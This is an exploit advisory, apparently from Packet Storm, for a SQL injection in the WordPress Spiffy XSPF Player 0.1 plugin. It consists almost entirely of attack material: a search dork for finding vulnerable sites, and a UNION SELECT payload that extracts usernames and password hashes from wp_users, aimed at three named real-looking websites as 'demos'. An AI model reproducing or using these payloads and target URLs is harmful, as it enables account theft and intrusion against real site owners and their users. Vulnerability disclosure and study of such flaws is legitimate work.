WordPress Spiffy XSPF Player 0.1 SQL Injection

2013-04-10T00:00:00
ID PACKETSTORM:121204
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-04-10T00:00:00

Description

                                        
                                            `##############  
# Exploit Title : Wordpress Spiffy XSPF Player plugin SQL Injection  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Home : www.ashiyane.org  
#  
# Security Risk : High  
#  
# Version : 0.1  
#  
# Dork : inurl:wp-content/plugins/spiffy/playlist.php?playlist_id=  
#  
##############  
#Location:site/wp-content/plugins/spiffy/playlist.php?playlist_id=[SQL]  
#  
#  
#DEm0:  
# http://www.greatacoustics.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
# http://www.animaterrasings.org/wp-content/plugins/spiffy/playlist.php?playlist_id=-7+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
# http://www.jaynekelly.com/wp-content/plugins/spiffy/playlist.php?playlist_id=-2+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5+from+wp_users--  
#  
##############  
#Greetz to: My Lord ALLAH  
##############  
#  
# Amirh03in  
#  
##############   
`